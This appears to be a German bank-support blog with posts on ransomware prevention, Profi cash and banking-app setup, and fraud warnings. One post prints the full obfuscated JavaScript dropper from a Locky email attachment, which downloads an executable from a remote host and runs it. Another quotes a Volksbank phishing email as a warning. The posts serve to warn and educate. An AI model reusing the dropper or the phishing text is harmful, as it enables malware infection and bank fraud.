Sicherheit: Vorsorge im Hinblick auf die Bedrohung durch Erpresserviren

by Leave a Comment

Digitale Erpressung ist für die Betrüger äußerst lukrativ und wir stehen vermutlich erst am Beginn einer Welle von Erpressungstrojanern, die neuesten Varianten dieser Viren sind vermutlich so gut Security-Shieldsprogrammiert, dass eine Entschlüsselung nicht mehr möglich ist. >Heise über PGP-Trojaner

Regelmäßig durchgeführte und geeignete Datensicherungsstrategien (Backups) sind absolut notwendig, wenn man wichtige Daten mit digitaler Technik verwaltet und mehr und mehr von der Technik abhängig wird.

Worst Case Szenario – was wäre wenn?

Ich halte folgendes regelmäßiges Gedankenspiel für sehr wichtig:

  • Was passiert im schlimmsten Fall mit meiner Arbeit/meinem Hobby oder meinem Betrieb/meinem Verein, wenn mir mein Arbeitssystem komplett abhanden kommt (Diebstahl, Brand im Serverraum)?
  • Kann ich sicherstellen, dass ich in der gewünschten Zeit wieder arbeitsfähig bin?
  • Was kostet mich der Aufwand?
  • Wie groß wäre der potentielle finanzielle oder zeitliche Schaden?
  • Habe ich Ausweichmöglichkeiten?
  • Könnte der Diebstahl Auswirkungen auf Zugänge haben und könnte ich diese schnell genug sperren, Passwörter ändern?
  • Hat sich nach meinem letzten Gedankenspiel wesentliches geändert, ist Hard- und Software noch zeitgemäß und kostengünstig ersetzbar?
  • Stimmen die Verträge mit meinen Dienstleistern noch und sind sie angemessen?

Gedankenspiele reichen nicht, Testen ist wichtig

Man muss regelmäßig testen, ob die Sicherungsmaßnahmen ausreichen und funktionieren, die man getroffen hat. Was nützt mir beispielsweise ein perfekt durchorganisiertes und zuverlässiges Bandsystem, wenn ich es an keinem Ersatz-Computer mehr installieren und an Laufen bringen kann. Oder wenn die alte Software auf einem aktuellen Betriebssystem nicht mehr funktioniert? Oder im Betrieb: Wenn die Leute, die sich mit der Rücksicherung einer Datenbank auskennen, bereits in Rente oder woanders beschäftig sind?

Was Sie zur Vorsorge wg. der aktuellen Bedrohungen machen sollten, können Sie hier lesen:

http://www.heise.de/newsticker/meldung/Krypto-Trojaner-Locky-Was-tun-gegen-den-Windows-Schaedling-3112408.html

http://www.heise.de/newsticker/meldung/Erpressungs-Trojaner-fernhalten-Mit-Windows-Bordmittel-Makros-in-Office-2016-global-verbieten-3149377.html

http://www.heise.de/newsticker/meldung/Erpressungs-Trojaner-Surprise-verbreitet-sich-anscheinend-ueber-TeamViewer-3148863.html

http://www.heise.de/thema/Ransomware

Über den Unsinn mit der Mail von „den unbekannten Absendern“.

Ergänzung: Es gibt ein Tool im Betastadium (aktuell nicht für den produktiven Betrieb empfohlen), das auf das typische Verhalten der Verschlüssellung reagiert und den Prozess anhält und Alarm schlägt:
http://www.heise.de/newsticker/meldung/Krypto-Trojaner-Locky-Batch-Dateien-infizieren-Windows-Tool-verspricht-Schutz-3118188.html

Das Tool ist nur ein Hilfsmittel und kein Ersatz für eine regelmäßige Datensicherung.

Update (04.07.2016):
Heise: Gratis Tools entschlüsseln diverse Erpressungs-Trojaner

Ransomware Locky: Anhang so klein – das kann keine Rechnung oder Fax sein

by 5 Comments

Die mir zugeschickte vermeintliche Rechnung oder das Fax enthält einen Anhang, der mit knapp über 700 Bytes (!)  einfach zu klein für ein PDF ist.

Was ist da los? Kein Virenscanner erkennt die zip Datei und den Javascript-Inhalt als Container einer Virendatei? Keiner von 54 Scannern auf Virustotal schlägt Alarm? Mein Kollege spekulierte gar nicht so abwegig: Das ist bestimmt der Bundestrojaner, der kommt „von oben“ und wird halt nicht erkannt.

Der Anhang enthält eine Javascript-Datei, die offeniichtlich  eine mit Unicode-verschleierte Webseite nachladen will. Sehr perfide, sehr geschickt.

Glaubt man den aktuellen Zahlen, werden pro Stunde 5000 Rechner in Deutschland vom enthaltenen Locky-Virus infiziert. Die Ransomware verschlüsselt die erreichbaren Dateien und man erhält  nur durch Zahlung eines Lösegeldes wieder die Ursprungsdateien zurück.

Siehe auch:
http://www.golem.de/news/ransomware-locky-kommt-jetzt-auch-ueber-javascript-1602-119331.html
Erpressungstrojaner Tesla (intern vrkennung.de)

Bildschirmfoto_2016-02-24_21-07-26

 

Die Verschleierung ist kein neues Thema:
http://www.heise.de/security/meldung/Rueckwaerts-wird-ein-Virus-draus-1242127.html

Code des Anhangs ( Javascript Datei hier als einfacher Text dargestellt und deshalb harmlos):

var fawqAx= this[‚\u0041c\u0074i\u0076\u0065XO\u0062je\u0063t‘];
var laMhHYOhH = new fawqAx(‚\u0057S\u0063r\u0069\u0070\u0074\u002E\u0053\u0068e\u006C\u006C‘);
var uDsEft = laMhHYOhH[‚\u0045x\u0070\u0061\u006E\u0064Envir\u006Fn\u006De\u006E\u0074S\u0074\u0072in\u0067s‘](‚\u0025TE\u004DP\u0025‘) + ‚\u002F\u0068\u0055O\u0048Mma\u0069n.\u0065x\u0065‘;
var nheEANo = new fawqAx(‚\u004D\u0053XM\u004C\u0032.X\u004D\u004C\u0048TT\u0050‘);
nheEANo[‚\u006Fn\u0072\u0065\u0061\u0064y\u0073\u0074\u0061\u0074ec\u0068\u0061\u006E\u0067e‘] = function() {
if (nheEANo[‚\u0072\u0065a\u0064\u0079\u0073t\u0061\u0074\u0065‘] === 4) {
var RxgIdfvB = new fawqAx(‚\u0041\u0044\u004F\u0044\u0042.S\u0074\u0072\u0065\u0061\u006D‘);
RxgIdfvB[‚op\u0065\u006E‘]();
RxgIdfvB[‚\u0074\u0079pe‘] = 1;
RxgIdfvB[‚\u0077ri\u0074\u0065‘](nheEANo[‚\u0052es\u0070\u006F\u006E\u0073e\u0042\u006F\u0064\u0079‘]);
RxgIdfvB[‚\u0070os\u0069\u0074\u0069\u006F\u006E‘] = 0;
RxgIdfvB[‚\u0073av\u0065\u0054o\u0046\u0069le‘](uDsEft, 2);
RxgIdfvB[‚\u0063lo\u0073\u0065‘]();
};
};
try {
var    HYOAzVaz = ‚R\u0075n‘;
nheEANo[‚\u006F\u0070en‘](‚GE\u0054‘ , ‚h\u0074\u0074p://\u0068t\u0074\u0070\u003A\u002F\u002F\u0066i\u0072\u0073t\u0063o\u0070\u0079\u006Dall\u002E\u0063\u006F\u006D/\u0073\u0079\u0073t\u0065m\u002F\u006Co\u0067\u0073\u002F\u0038\u0037h7\u00354‘, false);
nheEANo[‚\u0073e\u006Ed‘]();
laMhHYOhH [HYOAzVaz](uDsEft, 1, false);
} catch (ajg9ggxFs) {};

Betrugsversuch: Volksbanken Raiffeisenbanken: Wichtig: neue Sicherheits-Software Update

by Leave a Comment

Die Betrugsmail ist in beinahe perfektem Deutsch geschrieben, enthält das typische VR-Logo und ist doch ein Betrugsversuch. Der Link verweist glücklicherweise auf auf eine Seite, die nicht mehr existiert, aber dies kann sich ja schnell ändern.

Man beachte die Anrede. der Absender lautet info@volksbank.de

Wichtig: neue Sicherheits-Software Update

Sehr geehrter Herr Sichmann,

uns bei der Volksbank liegt die Sicherheit und Integrität unserer Konten sehr am Herzen.

Leider wurde diese Sicherheit in den letzten Wochen stark gefährdet. Viele unserer Kunden sind Opfer von Cyberkriminellen und Hackern geworden.

Um dieses Problem so schnell und effizient wie möglich zu beseitigen, haben wir eine
neue Sicherheits-Software entwickelt, die unseren Online-Konten mehr
Sicherheit gibt und unsere Kunden vor solchen Übergriffen beim Online-Banking schützt.
Gerade arbeiten wir daran, diese Software auf den Online-Konten aller Kunden zu installieren.

Bitte klicken Sie zur Verifizierung auf folgenden [link entfernt und Wort Link fehlt]

Wir bedanken uns für Ihre Mitarbeit

Mit freundlichen
Grüßen,

Ihr Volksbank-Kundenservice


Bundesverband der Deutschen Volksbanken und Raiffeisenbanken e.V. (BVR)
Schellingstraße 4
10785 Berlin
©Volksbanken und Raiffeisenbanken 1998-2014. Alle Rechte vorbehalten

Profi cash Sicherheitsdatei erstellen

by Leave a Comment
letzte Änderungen 18.10.2022
Suchwort: #Profi-neue-hbci-Datei

Da ein Programm üblicherweise nicht weiß, wer gerade an der Tastatur sitzt und aus Sicherheitsgründen auch eine eigene Passwortverwaltung hat, dient in Profi cash die Benutzerverwaltung auch zur Zuordnung der Bankzugangsdaten. Die meisten Banken verwalten Bankzugänge personenbezogen. Üblicherweise reicht dann eine elektronische Unterschrift, um alle Konten einer Bank zu erreichen.

Mehrere Firmen:
Wenn Sie mehrere Firmen in Profi cash nutzen, darunter versteht Profi cash die Mandantenfähigkeit, also mehrere getrennt administrierbare Datenbanken, dann müssen Sie die Sicherheitsdatei nur einmal neu erzeugen. In den anderen Firmen lesen Sie die vorhandene Datei ein. Die Benutzer müssen aber in jeder Firma angelegt werden.

Neue Benutzer für Profi cash
neue Benutzer: Profi cash verwaltet die Bankzugänge also über die Benutzer/in. Die Benutzer legt der Master an, er hat die Rechte dazu. Bitte melden Sie sich als master in der Firma an und legen Sie die gewünschten Anwender in der Software an. Sie finden die Menü-Berechtigungen und Kontoberechtigungen unter „Stammdaten“, „Anwenderverwaltung“.

Jeder neue Benutzer meldet sich anschließend separat an und ändert das  bei neuen Zugängen mit dem Passwort „system“ und muss dann ein eigenes Passwort angeben.

Dieses Passwort ist das Zugriffspasswort für die Software, es sollte nicht mit dem Bank-Passwort übereinstimmen.

Melden Sie sich mit Ihrem Benutzer in Profi cash an.

Profi cash 11

Nach der Anmeldung erfolgt in Profi cash 11 die Anlage des HBCI-Zuganges im Menü Stammdaten/HBCI-Verwaltung.

Wählen Sie oben rechts den Button „neu…“ an oder „Bearbeiten“, wenn bereits ein Zugang existiert. Tragen Sie oben ein neues Kürzel ein, z.B. Bankname Vorname, das Programm erzeugt automatisch einen neuen Datensatz (der Button „Leeren-Neu“ bewirkt das gleiche) wie ein neuer Eintrag. Wählen Sie als Sicherheitsverfahren „Sicherheitsdiskette/Sicherheitsdatei“ aus.

Geben Sie dann die BLZ  ein und wählen dann das nächste Feld an. Sie benötigen die Benutzerkennung, beginnend mit 672… Profi cash fragt zum Teil noch die VR-Kennung im zweiten Feld ab, lassen Sie das Feld einfach frei oder tragen Sie die Benutzerkennung auch hier ein. Das Passwortfeld lassen Sie bitte ebenfalls frei. Sie sollten es nicht speichern. Sinnvoll kann dies nur in perfekt abgesicherten Systemen sein oder z.b. bei automatischem Abruf mit eingeschränkten Berechtigungen.

Spätestens jetzt sollten Sie den USB-Stick oder einen anderen Wechseldatenträger einstecken und den Drucker einschalten. Das Programm führt Sie durch die weitere Anlage und bietet Ihnen den Pfad zum Speichern der neuen Schlüsseldatei an, sofern dieser nicht bereits festgelegt war.

Wenn Sie keinen Stick griffbereit haben, können Sie auch übergangsweise die Festplatte oder einen anderen Pfad angeben. Sie erhalten dann einen Sicherheitshinweis. Bei der Passwortvergabe müssen Sie sich ein individuelles Passwort ausdenken, das Sie sich gut merken können. Es spricht nichts dagegen, wenn Sie das Passwort notieren, wenn niemand anders Zugriff darauf hat.

Die Bank kennt dieses Passwort nicht, es dient zur Sicherung der Schlüsseldatei. Es muss eins der erlaubten Sonderzeichen beinhalten und min. 8 Zeichen lang sein. Bei der ersten Datenübertragung wird der Hash (eine Art Prüfsumme) des Bankschlüssels zur Prüfung angezeigt. Sie sollten diesen in den Unterlagen finden oder hier vergleichen.

Der Hashwert – eine Art  Prüfsumme für eine wesentlich größere Zahl – wird errechnet und angezeigt. Vergleichen Sie diesen mit den Unterlagen Ihrer Bank. Bei der GLS Bank  lautet dieser

69 F2 B5 D0 A6 64 D5 2E F0 43 A0 35 4D BD 65 88

48 89 1A 1A 23 85 A1 B1 AE 55 00 8A 2F F4 99 9D

Das Prinzip: Ändert sich nur eine einzige Stelle des Schlüssels, so wird ein vollkommen anderer Hash errechnet und angezeigt, so dass man Manipulationen sofort erkennt. Am Ende erfolgt der Druck des sogenannten INI-Briefes. Senden Sie diesen bitte an die Bank. Den Druck können Sie wiederholen unter Datei/Protokolle/Druck wiederholen. Führen Sie das Menü zu Ende.

Profi cash 12

In Profi cash 12 nutzen Sie das Menü „Einstellungen“ und den Button HBCI-Verwaltung im Menü-Band .

Wählen Sie oben rechts den Button „neu anlegen“. Wählen Sie als Sicherheitsverfahren „Sicherheitsdatei“ aus.

Tragen Sie oben ein neues Kürzel ein, z.B. Bankname Vorname, das Programm erzeugt automatisch einen neuen Datensatz (der Button „Leeren-Neu“ bewirkt das gleiche) wie ein neuer Eintrag. Wählen Sie als Sicherheitsverfahren „Sicherheitsdiskette/Sicherheitsdatei“ aus.

Jetzt sollten Sie den USB-Stick oder einen anderen Wechseldatenträger einstecken.

Je nachdem, ob Sie eine neue Sicherheitsdatei erzeugen wollen oder eine bereits vorhandene Sicherheitsdatei in der Firma/in Profi cash anmelden möchten wählen Sie den Button an.

Mit Klick auf den „drei-Punkte-Button“ öffnen Sie den Dateidialog zur Auswahl des Pfades. Einen Dateinamen können Sie nicht anlegen, aber einen neuen Ordner.

 

Der Pfad wird übernommen.

Klicken Sie auf weiter. Wenn Sie keinen Wechseldatenträger gewählt haben, sehen Sie ein Hinweisfeld.

Geben Sie dann die BLZ  ein und wählen dann das Feld an und klicken Sie auf „Weiter“. Die Zugangsadresse sollte automatisch gefüllt sein.

Sie benötigen die Benutzerkennung, beginnend mit 672… Profi cash fragt zum Teil noch die VR-Kennung im zweiten Feld ab, lassen Sie das Feld einfach frei oder tragen Sie die Benutzerkennung auch hier ein.

Das Passwortfeld lassen Sie bitte ebenfalls frei. Sie sollten es nicht speichern, denn dann reicht das Profi cash Passwort und der Stick, um Buchungen auszuführen. Sinnvoll kann dies nur in perfekt abgesicherten Systemen sein oder z.b. bei automatischem Abruf mit eingeschränkten Berechtigungen.

Geben Sie ein sinnvolles HBCI-Kürzel ein, gerade wenn Sie mit mehreren Banken arbeiten. Vor einer Buchungs-Freigabe werden Sie aufgefordert, den Datenträger einzustecken, das ist also dann die letzte Chance zur Erkennung, falls Sie sich beim Bankkonto vertan haben. Klicken Sie auf „Fertig stellen“.

Jetzt sollten Sie den Drucker einschalten.

Das Programm führt Sie durch die weitere Anlage und Passwortvergabe.

Die Bank kennt dieses Passwort nicht, es dient zur Sicherung der Schlüsseldatei. Es muss eins der erlaubten Sonderzeichen beinhalten und min. 8 Zeichen lang sein. Bei der ersten Datenübertragung wird der Hash (eine Art Prüfsumme) des Bankschlüssels zur Prüfung angezeigt. Sie sollten diesen in den Unterlagen finden oder hier vergleichen.

Der Hashwert – eine Art  Prüfsumme für eine wesentlich größere Zahl – wird errechnet und angezeigt. Vergleichen Sie diesen mit den Unterlagen Ihrer Bank. Bei der GLS Bank  lautet dieser

69 F2 B5 D0 A6 64 D5 2E F0 43 A0 35 4D BD 65 88 
48 89 1A 1A 23 85 A1 B1 AE 55 00 8A 2F F4 99 9D

Das Prinzip: Ändert sich nur eine einzige Stelle des Schlüssels, so wird ein vollkommen anderer Hash errechnet und angezeigt, so dass man Manipulationen sofort erkennt. Am Ende erfolgt der Druck des sogenannten INI-Briefes. Senden Sie diesen bitte an die Bank. Den Druck können Sie wiederholen unter Datei/Protokolle/Druck wiederholen. Führen Sie das Menü zu Ende.

Wenn Konten bereits vorhanden sind, muss jetzt noch die Zuordnung des neuen HBCI-Zuganges in Profi cash 11 unter Stammdaten/Konten Auftraggeber erfolgen. Wählen Sie oben ein passendes Kontokürzel aus und wählen Sie unten das neue HBCI-Kürzel an. Bestätigen Sie mit „Speichern“. Bei mehreren Konten fragt Profi cash, ob der Zugang bei mehreren Konten genutzt werden soll. In Profi cash 12 heißt das Menü „Einstellungen“ „Auftraggeberkonten bearbeiten“.

Soll der neue Zugang bei mehren Firmen (Datenbanken in Profi cash) zur Anwendung kommen, dann lesen Sie bitte in den folgenden Firmen den Schlüssel aus der Sicherheitsdatei aus und bestätigen Sie die Übernahme.

Eine Benutzerkennung kann bei den genossenschaftlichen Banken nur 1x elektronisch initialisiert werden, eine zweite Verwendung ist nicht möglich. Bitte erstellen Sie daher ein Backup (Sicherheitskopie) Ihrer neuen Schlüsseldatei.

Weitere Sicherheitshinweise:
Die Sicherheitsdatei und das Passwort dürfen nicht in andere Hände geraten. Geben Sie diese niemals an Dritte weiter, auch nicht an Vorgesetzte und Ihren Partner. Sie handeln sonst grob fahrlässig.
Wenn Sie den Verdacht haben, Passwort und Sicherheitsdatei könnte in falsche Hände geraten sein, also wenn wenn Sie z.B. eine Schadsoftware auf Ihrem Rechner oder im Netzwerk entdeckt haben oder wenn Sie gar den Verdacht haben, jemand könnte an Ihre Sicherheitsdatei gelangt sein,  dann müssen Sie bei uns die Schlüssel elektronisch selbst austauschen und sollten anschließend auch Ihr Passwort ändern. Ein neuer Brief an die Bank ist nicht nötig, da die neuen Schlüssel elektronisch mit dem alten Schlüssel freigeschaltet werden können. Nutzen Sie dazu wieder die HBCI-Verwaltung unter Stammdaten, und wählen Sie „Schlüssel ändern“ und lassen Sie sich durch den Prozess führen. Wählen Sie dann auch „Passwort ändern“ aus, um das Zugriffspasswort der Schlüsseldatei zu ändern.

Sicherheitsdatei:

Sie werden es nicht bemerken, wenn die Datei kopiert wurde. Das Passwort kann nahezu unendlich oft durchprobiert werden und ist durch Schadprogramme (Viren) außerdem einfach auszulesen (zur Not wird die Eingabe beobachtet, z.B. mit einer Kamera). Wenn Sie hier den Hauch einer Gefahr sehen, wechseln Sie unbedingt !!! das Verfahren.

Daher sollte die Sicherheitsdatei auch auf einem Wechseldatenträger genutzt werden, den Sie nach dem Gebrauch aus dem Rechner abziehen können.

SEPA-Einzel-Lastschriften im Onlinebanking einsehen und löschen

by Leave a Comment
Lastschriftfreischaltung für das Onlinebanking

Mit der Systemumstellung auf das Folgesystem ändert sich bei den Genossenschaftsbanken der Weg grundlegend. Die Anmeldung erfolgt über eine zweite Anmeldung, die separat freigeschaltet werden muss, dem sogenannten „Business-Portal“ oder „Erweitertem Onlinebanking“.  Jede Bank kann das individuell bezeichnen. Für diesen Zugang muss der VR-NetKey separat freigeschaltet werden, genauso wie die Berechtigung zum Lastschrift-Einzug. Ein direkter Wechsel vom „Normalen Onlinebanking“ ist nicht möglich, ein Abmelden und Neuanmelden ist nötig. Wenig zeitgemäß, aber daran wird gearbeitet.

Die Erfassungen erfolgen dann unter dem Menü „Lastschriften“.

(Screenshots folgen noch).

 

Alte Anleitung für Banken mit noch bank21-System (bis Ende 2019).

Wie Sie die Aufträge per Upload einer ZV-Datei hochladen können, sehen Sie in dieser Anleitung.

Wählen Sie unter „Zahlungen“ das Menü „SEPA-Terminlastschriften“.

 

BOF_SEPA-Terminlastschrift_Menue

Sie sehen dort den Bestand im Speicher („Parkplatz“) der Bank.
BOF_SEPA-Terminlastschrift_Bestand

Ändern und Löschen können Sie nur noch die nicht übertragenen Aufträge.

Klicken Sie dazu auf das Datum links, es öffnet sich der Dialog zur Änderung und Löschung des Einzel-Auftrages.

BOF_SEPA-Terminlastschrift_Bestand_aendern

Zum Zeitpunkt der Übertragung wird das Lastschrifteinreicherlimit geprüft und die Buchungen werden an die anderen Banken verteilt. Nun sehen Sie die Lastschriften bis zur Gutschrift auf Ihrem Konto unter „Finanzen & Umsätze“ und dort unter „Angekündigte Latschriften“.

BOF_Lastschriften_Menue_angekuendigte

Die Aufträge haben nun die Bank verlassen.

 

BOF_Lastschriften_angekuendigte

App GLS mBank und Banking4A Bankzugang einrichten oder umstellen

by Leave a Comment
zuletzt geändert 30.01.2023
Suchwort #mbankbearb

Die Bankeinstellungen finden Sie nach der Anmeldung im Hauptmenü, dort wo Sie die Liste Ihrer Konten sehen.

Unter Android finden Sie das Hauptmenü oben links. Für iPhone und iPad fehlt mir leider die Hardware. Die Felder sollten ähnlich sein, die Steuerung dürfte aber leicht abweichen.

Sie können auch vom linken Rand nach rechts wischen.

Wenn Sie im Menü sind, wischen Sie nach unten…

bis zu „Bankzugänge“

 

 

Sie sehen die Liste der eingetragenen Bankzugänge. Wählen Sie den Bankzugang an und…

GLS_mBank_Android_Bankzugang_03um den Zugang umstellen zu können, aktivieren Sie das „Stiftsymbol“.

GLS_mBank_Android_Bankzugang_04

Für PIN & TAN: Ich empfehle, den VR-NetKey zu verwenden, da sich dieser nicht ändert. Dies kann auch  notwendig sein, wenn Ihr Alias Sonderzeichen enthält.  Der VR-NetKey enthält nur Ziffern.

Die Serveradresse erkennt die Software anhand der BLZ.

GLS_mBank_Android_Bankzugang_06

 

Wenn Sie z.B. auf SecureGo plus wechseln möchten, wählen Sie hier das neue Verfahren aus.

 

Wenn Sie mehrere TAN-Verfahren freigeschaltet haben, wählen Sie das passende aus.

Die Bezeichnung des TAN-Mediums sollte leer bleiben. Nur wenn Sie einen zum Standard-Medium abweichendes Medium „für unterwegs“ aktivieren wollen, müssen Sie hier das gewünschte Medium eintragen. Die Bezeichnung muss dann genau stimmen.

GLS_mBank_Android_Bankzugang_07_TAN-Zugang

Synchronisieren Sie anschließend den Zugang über den Button. Die App aktualisiert automatisch die Konten und ruft die vorhandenen Daten ab.

Ransomware Trojaner: Doch noch Hoffnung

by Leave a Comment

Ich hatte ja hier geschrieben, man solle als Opfer der neuen Version des Tesla-Cryptotrojaners alle Hoffnung fahren lassen, sofern man kein Backup habe oder man bereit sei, die Erpresser zu bezahlen. Nun, offensichtlich gilt das doch noch nicht für die Version 2 des Tesla-Trojaners:

http://www.heise.de/newsticker/meldung/Verschluesselungs-Trojaner-TeslaCrypt-2-geknackt-Kriminelle-ruesten-nach-3092667.html

Also blieb den Opfern, die drei Monate auf Ihre Daten verzichten konnten, doch noch die Möglichkeit. Interessant ist dabei: Offensichtlich ist nicht Verschlüsselung geknackt worden, sondern der Schlüssel zur Entschlüsselung wurde auf dem Opferrechner hinterlassen.

Irgendwie kann ich nicht glauben, dass das ein unabsichtlicher Fehler war…

 

Ein weiterer Schadsoftware-Scanner: runscanner

by Leave a Comment

Dieser Blogbeitrag ist aktuell eher eine Gedächtnisstütze für mich, als ein aktueller Tipp für Hilfesuchende, sorry. Hatte ich doch letzte Woche das erste Mal das Erlebnis, dass ein Schadsoftware offensichtlich den Browser im Onlinebanking manipulierte und weder malwarebytes, noch process-Explorer von Sysinternals etwas fand.

Wobei sich letzterer beim Prüfen der Hashwerte gegen die Viren-Datenbank von virustotal.com (die sind inzwischen bei google, die heißen bald Alphabet) einfach weghing.

Sehr beängstigend war die Aussage der IT-Firma: Da ist kein Trojaner auf dem Rechner, die Aufforderung zur Rücküberweisung muss von der Bank kommen. Das entspricht so im Sinn der Aussage: Eine Grippe ist Einbildung, ich hab oft genau hingesehen und von diesen angeblichen Viren hab ich noch nie eines gesehen. Wenn sowas vom Arzt kommt, sollte man den wechseln.

Links (geprüft am 02.02.), Hinweis: Diese Tools nur auf eigene Gefahr einsetzen, ohne Gewähr, keine Garantie.

Achso: Malwarebytes heißt es, nicht maleware…. 🙂

 

Onlinebanking per Browser: terminierte ZV-Dateien ändern und löschen

by Leave a Comment

Terminierte Überweisungen-Zahlungsverkehrsdateien können Sie im gleichnamigen Menü unter „Zahlungen“ kontrollieren und auch löschen, hochgeladene und noch nicht übertragene Lastschrift-Dateien sehen Sie unter ZV-Upload.

Das Menü finden Sie unter „Zahlungen“ und „Terminierte ZV-Dateien“. Wie Sie Dateien vorher im Browser zu einer GAD-Bank hochladen können, lesen Sie hier.

Begriffklärung bei Lastschriften: Unter Ausführungsdatum versteht man in diesem Zusammenhang das Fälligkeitsdatum der Lastschrift, also das Belastungsdatum beim Zahlungspflichtigen!

BOF_SEPA-Terminlastschrift_und_ZV-Upload_Menue

Die unterschiedlichen Dateien können Sie in der Übersicht über den Dateinamen auseinanderhalten.

Onlinebanking_Terminierte_ZV-Datei_02_Auswahl

 

Wenn Sie etwas ändern oder löschen wollen oder mehr Informationen benötigen, klicken Sie auf den Dateinamen links.

Onlinebanking_Terminierte_ZV-Datei_03_Auswahl

Sie können das Ausführungsdatum ändern oder die Datei löschen. Mit Klick auf Detailinformationen erfahren Sie mehr über den Inhalt der Buchung.

Onlinebanking_Terminierte_ZV-Datei_04_Auswahl

Das Ausführungsdatum ist bei Lastschriften der Fälligkeitstermin, also der Belastungstermin bei den Zahlungspflichtigen. Denken Sie daran: Dieser Fälligkeitstermin muss nach den SEPA-Regularien als Zahltermin rechtzeitig den Zahlungspflichtigen bekannt gemacht sein. Wenn Sie das nicht einhalten, haben Sie keinen Anspruch auf Kostenerstattung, sollte die Lastschrift nicht eingelöst werden.

Der Übertragungstermin wird durch die Art der Lastschrift und die Sequenz (einmalig, erstmalig, Folgelastschrift) bedingt.

Lastschrift-Datei_06_terminierte_ZV-Datei_loeschen_aendern_Button

Häufige Fragen zur VR-Kennung, Alias und VR-NetKey (FAQ)

by 4 Comments
zuletzt geändert: 06.07.2019
Ist der VR-NetKey, die VR-Kennung, der Alias geheim?
Nein, diese sind  nicht geheim, sondern vertraulich, sie kann auch von Mitarbeiterinnen und Mitarbeitern Ihrer Bank eingesehen werden. Sie sollte aber nicht an Dritte weitergegeben werden. Wirklich geheim sind PIN und Passwörter.
Warum sind sie vertraulich?
Mit bösem Willen kann der der VR-NetKey/ dieVR-Kennung bei der PIN&TAN-Nutzung z.B. dazu missbraucht werden, den jeweiligen Zugang zu sperren, z.B. durch fehlerhafte PIN-Eingaben. Daher sollte man sie vertraulich behandeln und vor allen Dingen einen Alias verwenden, den man zur Not selbst ändern kann.
Warum kann ich keinen Alias mit VRK am Anfang vergeben?
Anhand der Anfangszeichen „VRK“ erkennt der Bankserver, dass es sich um einen Alias handelt oder eben um die VR-Kennung.
Warum soll ich nicht meinen Alias bei der Einrichtung meines FinTS/HBCI-Zugangs verwenden?
Tatsächlich funktioniert die Verwendung Ihres Alias durchaus auch in FinTS/HBCI, aber Sonderzeichen können die Verbindungen stören. Der Alias kann auch leicht geändert werden, während man in der Zahlungsverkehrssoftware/App so gut wie nie Einstellungen ändern muss.
Meine Benutzerkennungen reichten bisher, warum soll ich die VR-Kennung verwenden?
Bei allen neuen Zugängen, neuen Konten oder Signaturen benötigt der Zugang die zusätzliche Steuerung über die VR-Kennung. Das ist durch das Rechenzentrum vorgegeben. Dies entfällt bei der Umstellung der Bank auf das neuere System 

Sollten weitere Fragen auftreten:

Bitte nutzen Sie die Kommentar-Funktion oder melden Sie sich im onlinebanking-Forum an.